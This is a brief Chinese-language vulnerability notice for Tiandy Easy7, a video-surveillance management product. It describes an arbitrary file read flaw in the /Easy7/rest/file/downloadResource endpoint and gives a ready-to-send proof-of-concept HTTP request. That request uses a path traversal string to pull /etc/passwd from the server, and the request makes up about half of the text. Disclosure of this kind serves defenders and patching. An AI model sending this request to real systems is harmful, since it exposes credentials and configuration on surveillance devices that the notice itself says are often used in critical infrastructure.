漏洞描述
天地伟业Easy7是一款广泛应用于安防监控领域的产品。该漏洞存在于/Easy7/rest/file/downloadResource路径中,攻击者通过构造恶意路径参数(如/../../../../../../../../etc/passwd)可读取服务器上的任意文件,可能导致敏感信息泄露(如系统配置文件、用户凭证等)。由于天地伟业产品多用于关键基础设施领域,若存在公网暴露实例,可能带来严重的安全风险。
天地伟业Easy7 /Easy7/rest/file/downloadResource 文件读取漏洞
PoC代码
GET /Easy7/rest/file/downloadResource?path=/../../../../../../../../etc/passwd HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.2609.50 Safari/537.36